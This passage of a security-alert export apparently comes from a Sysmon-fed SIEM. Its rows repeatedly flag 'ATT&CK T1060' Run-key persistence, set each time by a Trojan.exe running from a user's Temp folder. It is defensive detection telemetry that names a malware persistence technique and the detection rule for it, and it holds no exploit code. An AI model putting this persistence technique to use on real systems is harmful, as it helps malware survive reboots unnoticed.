..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:49.606603300Z"",""eventRecordID"":""1939"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:49.605\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:49.605"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:51.986",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:48.590 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:48.591204000Z"",""eventRecordID"":""1938"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:48.590\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:48.590"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:50.986",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:47.574 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:47.581091800Z"",""eventRecordID"":""1937"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:47.574\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:47.574"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:49.971",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:46.559 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:46.561577400Z"",""eventRecordID"":""1935"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:46.559\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:46.559"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:48.955",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:45.543 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:45.544577300Z"",""eventRecordID"":""1934"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:45.543\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:45.543"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:47.924",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:44.512 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:44.513540100Z"",""eventRecordID"":""1933"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:44.512\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:44.512"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:46.909",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:43.496 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:43.498045100Z"",""eventRecordID"":""1932"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:43.496\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:43.496"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:45.877",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:42.481 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:42.485429400Z"",""eventRecordID"":""1931"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:42.481\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:42.481"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:44.861",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:41.450 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:41.466708800Z"",""eventRecordID"":""1930"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:41.450\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:41.450"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:43.862",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:40.449 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:40.449946500Z"",""eventRecordID"":""1929"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:40.449\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:40.449"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:42.831",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:39.434 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:39.434921900Z"",""eventRecordID"":""1927"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:39.434\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:39.434"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:41.815",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:38.418 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 